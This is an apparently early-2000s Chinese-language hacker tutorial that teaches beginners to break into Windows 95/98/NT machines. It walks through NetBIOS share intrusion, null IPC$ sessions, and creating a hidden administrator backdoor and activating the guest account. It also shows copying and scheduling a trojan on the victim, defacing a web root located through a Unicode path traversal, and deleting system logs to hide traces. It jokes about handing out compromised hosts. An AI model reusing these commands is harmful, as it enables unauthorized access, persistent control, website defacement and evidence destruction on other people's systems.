骇客指令

骇客指令 IP? 所谓IP就像是我们家的地址,因特网就像是一个地球村,当你拨号或连上网络时就像你要加入到这地球村的一份子,既然要加入的话,当然就需要一个地址啰!也像是婴儿出生了,就需要有一个名字一样,只是在因特网上的这名字不是中文的,而是由4组数字来分别,这4组当中以"."来分别,如 255.255.255.255 这四组中从0~255,不得大于255,所以列子中的这一组是最大的了。 IP? 知道对方的IP是黑客的第一要素,不知道IP就什么都做不了了。 在WINDOWS中寻找出Winipcfg.exe按两下,或从"开始/执行"窗口打入Winipcfg.exe按执行,但是你要连上网络才行,只不过这只有知道本身的IP地址。 在开启"开始/程序集/MS-DOS模式"窗口,输入NETSTAT -N后按ENTER,可以得到本身及跟网络上跟你有接触的IP,左边是你本身的IP,右边为对方的。 ISP? 哈阿哈~~那就简单了,在"开始/程序集/MS-DOS模式"窗口打入NETSTAT按执行这样就知道对方是使用那一家ISP上网了,不过呢?有一些很不负责的ISP没有设定也就没有办法知道了,但是也是可以使用浏览器侦测出来。以后再公布吧! IP,? 比如对方的IP是163.30.100.16 然后在"开始/程序集/MS-DOS模式"窗口打入 "TRACERT 163.30.100.16" 后按执行得到如下的讯息: ----------------------------------------------------------------- 1 115 ms 105 ms 110 ms h199.s42.ts.hinet.net [168.95.42.199] 2 99 ms 103 ms 103 ms h158.s42.ts.hinet.net [168.95.42.158] 3 106 ms 100 ms 100 ms h241.s42.ts.hinet.net [168.95.42.241] 4 104 ms 108 ms 101 ms TaiNan-R01.BR.HiNet.NET [168.95.202.133] 5 109 ms 107 ms 105 ms TaiPei-R02.BR.HiNet.NET [168.95.202.253] 6 115 ms 107 ms 112 ms h10.s78.ts.hinet.net [168.95.78.10] 7 106 ms 109 ms 107 ms h48.s78.ts.hinet.net [168.95.78.48] 8 268 ms 287 ms 249 ms h16.s100.ts30.hinet.net [163.30.100.16] ------------------------------------------------------------------ 从第4行可以知道我是在台南用HINET上网的,从第5行可以看出对方是在台北上网的,该是台北县,也是用HINE上网的。其实呢!还可以看出更多的东西,慢慢的体会吧!最少可以知道你跟对方的联机是否有顺畅。 9598,? 只要知道对方的ip,及计算机名称即可,也都不需要工具,在此强调,不要满脑筋老是想到要使用工具,其实我只是一个写程序的,就像程序完成了交给客户使用,而客户只会使用,他们了解什么呢?至于为什么写程序会涉及网络的侵入呢?那是因为我有些程序需要两岸三地,或在国际间传送数据,加上客户有时连专线费用都要省,所以不得不出此下策。 ? 当知道对方的ip之后,如对方的IP是163.30.100.16,在"MS-DOS"窗口中输入" 163.30.100.16",会得到一些信息(因涉及对方隐私,故不列说明),第一行就是对方的计算机名称,第二行是工作群组或网域,第三行是计算机说明,如果还有第四、五行的话,就表示对方的计算机是在区网中,也就是说他的计算机还准备连接内部的网络。最后一行是他 进入系统的使用者名称。 请注意指令的参数是要大写的,另外要是对方使用的计算机是98而且没有资源共享,或许你就侦测不出来了,除非使用特殊的手法,有些网友常会在计算机名称输入自己的真实姓名,如果这样的话,那么我们就会知道他的真实姓名了。 ICQ,,,,,ICQ??? (１).其实不管是什么样的网络软件,只要知道程序开启的PORT就可以控制他,像是网页的话大部份都是PORT=80,一上网呢 ,就会开139,旧版的95都不会关了这一PORT,所以就常被当机,但98也是有,以后再述,最多人用的NetMeeting聊天一开就是1503,登入及聊天就会开1720跟1730。 (２)ICQ呢?在以前时都是开在1027,可是因为常受到攻击,所以现在的PORT都开在好几千以上了,所以有些的炸ICQ程序都不 能用了,可是只要知道PORT之后,还是照炸不误, (３）会写程序的人可以自己写,只要从PORT送进一些信息就可以达到目地,如送进CHR(7)这类的封包...等等,甚至可以毁了ICQ,不会写的呢?是不是就完了呢?不会的,站长了解您们,所以您们可以到"黑客宝箱"下载,那软件的功能很多,也很强,几乎连要毁掉对方的ICQ也可达到,还可以炸他,跟他开玩笑,输入对方的ICQ号码后,他会去找对方的PORT跟IP,只是有时PORT不是很准确,要是这样的话,你就把侦测出来的PORT加上256就行了。 (４）不要问我那软件怎么用,真是很报歉,因为一问的话,那我回答的就会很多,到时我就忙死了,这样就不能继续公布一些指令了,请见谅。 (５）在前面的基础忘了公布什么是PORT,真是很报歉,以后再插播吧!对了,前面公布的NETSTAT -N就可以看到PORT了。 ICQ?? (１)听说有一套软件可以救回被炸的ICQ,可是呢?其实都不用软件的,只要将ICQ目录中的DB备份起来,被炸时关了ICQ,之后再将备份好的DB覆盖过去就行了,如果嫌这样太麻烦了,那么会写程序的就用写的吧!只是一行的程序罢了,要不然您们还是去找那套软件 吧~听说很好找的,我没有用过,所以本站也不提供。 (２)以上是说被炸,那要如何不被炸呢,ICQ中有一个防火墙的项目,进去后设定你的PORT要开在哪里,保证让对方查PORT查的昏倒,当然是要设高一点的PORT了,可是呢?要是你ICQ名单上的人要炸你也是很容易的,他只要从ICQ发一封信息给你,马上到DOS下执行NETSTAT -N,这样你的PORT就马上被看到了,换言之..除了对方是高人外,炸你ICQ的人一定是你的朋友。 9598?? 相信看过前面的公布后,网友们该会知道对方的IP及计算机名称了吧!ok 那这样就行了,以下我只说如何做,要是网友想要知道原理,请在留言版,或是"黑客走廊"通知我,我会另外弄另一网页来公布他的原理,因为实在是太长了。步骤如下..请参考 １.在Windows下有一个档名为"LMHOSTS.SAM"的档案,把扩展名给删了,变成了"LMHOSTS",如果没有这档案的网友,就用记事本新 增一个就行了。 ２.用记事本开启LMHOSTS,再把里面的都删了,在第一行输入对方的IP及计算机名称,如 163.32.33.34 APP,163.32.33.34就是对方的IP,空一格后面的APP是对方的计算机名称,接着存盘。 ３.到"MS-DOS模式"下输入NBTSTAT -R 按ENTER ４.到"开始/寻找/计算机"输入对方的计算机名称,按立即寻找,在下面的窗口中就会出现了对方的计算机了,按他的计算机两下,就是进去了对方的计算机了,连对方有防火墙也档不住。 ５.入侵的前:是你在进入95.98时需要输入USERNAME跟密码,对方的计算机也要有资源共享,若需要密码(一般的使用者都不会设),或是对方没有资源共享的话,也都不需要破解密码的程序,但需要用NT或UNIX入侵,以后也会慢慢的公布。 NT?? WU.你问了那么多,无非就是侵入NT主机,一侵入你问我的7点问题就全都解决了,哈哈... 本来是要在下一次的"黑客指令"中公布的,你这样穷追猛打的问我,加上本站也即将关闭了，所以就在最后送你及各位网友一份礼吧!以下的指令很简单,但需要在NT下DOS中执行 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- (1) net use \\对方的ip \ipc$ ""/user:"" **此行指令为建立"无意义ipc通讯" (2) usrstat 对方网域 如对方的网域是domain就是打usrstat domain,(以下均以domain表示网域。 **此行为了解对方计算机有哪些使用者.名称.及登入时间 (3)global "domain user" domain **得知群组中的使用者 (4)netdomain query **得知网域的处理原则 (5)net use 要连接档案的路径 **将对方的硬盘变成我们硬盘的一部份 (6)... ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 从(2)之后要是你执行了没有那指令的话,那么到NT的正版光盘寻找,在此我漏了如何得知密码,从你给我的MAIL中知道你对计算机也十分有研究,我相信当建立了IPC通讯后,你该是动动脑的时后了,要是我连这也公布了,那么就违反我要关站的原则了。 重要的一点是,当你知道对方的最高使用者,及密码后,再重开机,你想你可以办任何事了。另外..你还要研究"信任网域"的基础,那会收获更多的。 以上..千万不要做坏事,需要知道现在有很多ISP公司都使用NT,千万不要偷别人的账号来用，OK 一把不利的菜刀给你了,磨刀石在你的身上,看你怎么磨利菜刀了,也怎么用这把菜刀。如果执行不成功的话,那么就改一下Lmhosts,有些指令要拿到最高使用者及密码需要这文件的对映,所以当你拿到使用者及密码后要重开机的原因在此。 不要再进一步问我这问题,我一说 就违反了我关站的原则了。以上拙见 谨供参考 PORT? 如果把IP解释成我们家的地址的话,那么PORT就是门了。当然我们家有时不只一扇门,使用的软件不一样,所要开启的门也就不一样,一般来说当我们开启一套网络软件后,便会开启一个或数个PORT,有些软件所开的PORT是固定的,但大部份都没有固定。黑客宝箱中有一扫PORT的软件,让网友们了解什么是port,各位网友请服用。 网络安全(黑客)的第一步 做什么事情都不急于求成，记得当初给我印象最深的是，YINJIE说的一句话：“技术具有一定的局限性”。别去羡慕那种高层次的技术，说实话，那些现在还不适合你。 说了这么一大堆废话，想必大家都会问，“如果我要学‘奇客’应该怎么开始呢？”。下面的内容是我个人的意见。 一、计算机基础 1）DOS命令 cd (改变当前目录) copy (拷贝文件) del (删除文件) deltree(删除目录树) dir(列文件名) edit(文本编辑) format( 格式化磁盘 ) md(建立子目录) mem (查看内存状况) type(显示文件内容) rd(删除目录) ren(改变文件名) ..... 这些命令虽然和网络安全没有直接的关系，但这个是你起步时必须要知道的，也就是说，如果这些命令的应用还没有掌握，就必须 先把这些给搞懂了。 2）对WINDOWS界面的了解 玩过电脑的人都知道，友好的界面，操作起来也不是很难，但我要你达到的不是操作这个目的，而是原理，暂且不说汇编程序这些， 你至少也应该知道什么东西放在哪个目录下吧！ 如果你对其的熟练程度不亚于比尔?盖茨对Windows的了解度，那你真的就成功了。呵呵，开个玩笑，至少大家现在还达不到这个水平。 二、网络相关 1、应用GOOGLE或其它搜索引擎，其实它才是你最好的老师，我也应该感谢LANTUCHEN让我对GOOGLE有着这么大的兴趣。 也许有些功能是你想象不到的，比如，你可以用GOOGLE来找出漏洞的主机，也就是，你只要在GOOGLE中填入相关的一些漏洞 代码（比如你利用UNICODE漏洞的时候，是不是在IE中打入一些代码来实现了，这就恰好符合了GOOGLE的要求，呵呵），就可 以搜索到一批相关的漏洞。 2、对端口的认识 端口就好象是大门，比如象我们学校，就有N个大门，东南西北都有，就是说，一个服务器也可以开N个端口，不过，也是有一 定的限制的。 现在我介绍一下常见的端口吧！ 1）、telnet登录的端口 (23/tcp) 这个信息表明远程登录服务正在运行，在这里你可以远程登录到该主机，这种不用密码的远程登录服务是危险的，如果可以匿名登 录，任何人可以在服务器和客户端之间发送数据。 2）、WWW(80/TCP)端口 它表明WWW服务在该端口运行 别告诉我你不知道WWW服务是什么哦，也就是说，如果有网站的服务器都有80端口。 3）、FTP（21/tcp) ftp服务和TELNET服务一样，你还可以从FTP服务器上获得或上传资料木马等，有的还是匿名登陆的，不过这样的好事好像不多。 4）、ECHO(7/tcp) 你在命令行中试着打入echo 我是一个奇客 >>c:\qiker.txt,看C盘看看，是不是多了一个文件，不用我说，大家也应该知道什么作用 了吧！ 5）、smtp端口(25/tcp) 该端口开放邮件传输协议 如果你的技术成熟，也许就能用它穿过防火墙。 6）、finger (79/tcp) 端口 finger服务对入侵者来说是一个非常有用的信息，从它可以获得用户信息，查看机器的运行情况等。 7）、远程控制（3389） 还有一个端口要重点介绍，对于你们来说，3389是不可避免的，因为他也是最容易被让你操作的，有空，我也可以给你们做几个 3389的肉鸡让你们玩玩啊！ 再比如110，13，22……等，都必须去掌握。 3、木马的基本知识 尽管老资格的“黑客”不大会去使用木马，但我观察，绝大部分的入侵都是通过木马来进行的，比如小榕的一个SRV.exe,那也是木 马中的一种啊。它的威力是众所周知的，一但被植入，就有被远程控制的可能，攻击者就可以象操作自己的机器一样控制你的机器， 甚至可以远程监控你的所有操作。 你必须去了解木马是如何侵入的？入侵的基本原理。在这里，我希望你会用它并且很熟悉的使用，记得当时我也是从接触木马开始 的，它培养了我对黑客技术的兴趣。 当今比较流行的木马有冰河的木马，我曾经问它是否会继续开发冰河，他给了完全否定的，呵呵，并且说它的危害性太大了。 它的默认端口是7626。 BO2000 这个比较古老的木马了，一般那些资深的黑客也都使用过它。 我叫你了解和掌握使用方法，并不是说，叫你知道去破坏啊， or you are a badboy！别误会，不是说你。并不需要你了解所有的木马，只要了解基本原理。 放送下，讲个故事给大家听吧：传说希腊人围攻特洛伊城，久久不能得手。后来想出了一个木马计，让士兵藏匿于巨大的木马中。 大部队假装撤退而将木马摈弃于特洛伊城下，让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的 时候从木马中爬出来，与城外的部队里应外合而攻下了特洛伊城。 4、对网络命令的熟悉 1）、NET 下面的操作你TELNET到对方主机上才会有效果。 你也可以在本地演示： 我要添加一个用户，为了让对方难察觉，最好贴加一个用户和系统用户差不多的 比如admin net user admin password /add 再将这个用户加到管理组 net localgroup administrator admin /add 这样就算一个后门做好了！这台机子也就可以说是你的肉鸡了。 net start telnet 这样可以打开对方的TELNET服务. 为了防止admin用户被察觉 将Guest用户激活，guest是NT的默认用户，而且很难删除的 net user guest /active:yes 这里是把一个用户的密码改掉，我们把guest的密码改为lovechina。 net user guest lovechina 一般IPC$入侵用NET比较多吧 基本命令是 net use \\211.15.66.169\ipc% "123456" /user:"qiker" （这个IP是我的，可千万别黑哦） 123456是密码，qiker是用户 退出的命令是 net use \\\ipc$ /delte 先别急着退出，查看硬盘上的东西，就把它的C盘映射到我的Z盘吧！ net use z:\\211.15.66.169\c$ at命令是用来运行程序的 一般你会复制一个木马上去 COPY C:\binhe.exe \\211.15.66.169\admin$ 在运行之前，你还必须要先知道他的时间 net time \\211.15.66.169 将会返回一个时间，这里假设时间为2:05,现在需要新建一个作业，其ID=1 at \\211.15.66.169 2:07 binhe.exe 2）、set 要黑别人网页必须要知道他的目录是在哪里的，默认情况一般会在c:\inetup\wwwroot 登陆到对方机子打入SET命令就可以看到： COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=211.15.66.169 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot（大家看到这里没有，这就是网站的目录了。） PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET script_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 要黑很容易，只要把自己准备好的网页替换上去就是了，默认主页名称一般会是default.htm,default.asp,index.html,index.htm,index.asp 3）、nbtstat 这个命令非常的重要，一般你也许会听说139端口开着有多危险，因为你只要开着，就可以通过NETSTAT来得到用户，只要破解 出来了， 那你的机子就完蛋了。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。 下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP <03>前面的就是用户。 这里的用户是PENTIUMII。 4）、attrib 这个是去只读命令 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 attrib +r index.htm 5）、netstat 这个命令，我称它为监听命令，只要我和某台机子通讯，我就可以得到他的IP netstat -an 不过你的速度一定要比快 6）、echo echo 奇客>index.htm echo 奇客>>index.htm 第一个的意思是覆盖index.htm原有的内容，把“奇客”写进index.htm。 第二个的意思是把“奇客”加到index.htm里面。 “>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。 大家可以本地测试 7）、del 现在的网警可不是喝粥的，不会两手发软，你还是赶快清理你的脚印，就是所谓的日志。 NT/2000的日志有这些需要删除了。 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 用小榕的工具也可以，你只要把文件复制上去，再打几个命令，就行 5、网络协议 1）、TCP/IP及其应用。TCP/IP是Internet上使用的协议，而Internet是世界上最大的互联网络。有关TCP/IP的各个方面，包括开放式通信模型、TCP/IP通信模型、IP网络中的命名和寻址机制、地址解析及反向地址解析协议、DNS域字服务器、WINS、地址发现协议、IPv6、IP网络中的路由协议(RIP、OSPF等)、互联网打印协议、LDAP目录服务、远程访问协议、IP安全与防火墙。如何为Windows 9x/NT配置TCP/IP；如何使用TCP/IP应用程序，包括远程登录、FTP、Web浏览等 2）、还要了解UDP协议 比如我们使用的QQ，它就是通过UDP协议来传输信息的。不过它有个特征就是只管传输不管对方是否收到。 3）、icmp等几个协议 如果你想尽快接触那种可爱型的拒绝服务式攻击，你必须对这些了如指掌。 概念性：网络安全通过对黑客行为和各种攻击进行分类、分析，论述了如何在具体实践中对付黑客的入侵，如何维护系统的安 全；讨论了计算机安全所涉及的法律问题以及如何在高风险环境中应用密码学知识来保护信息。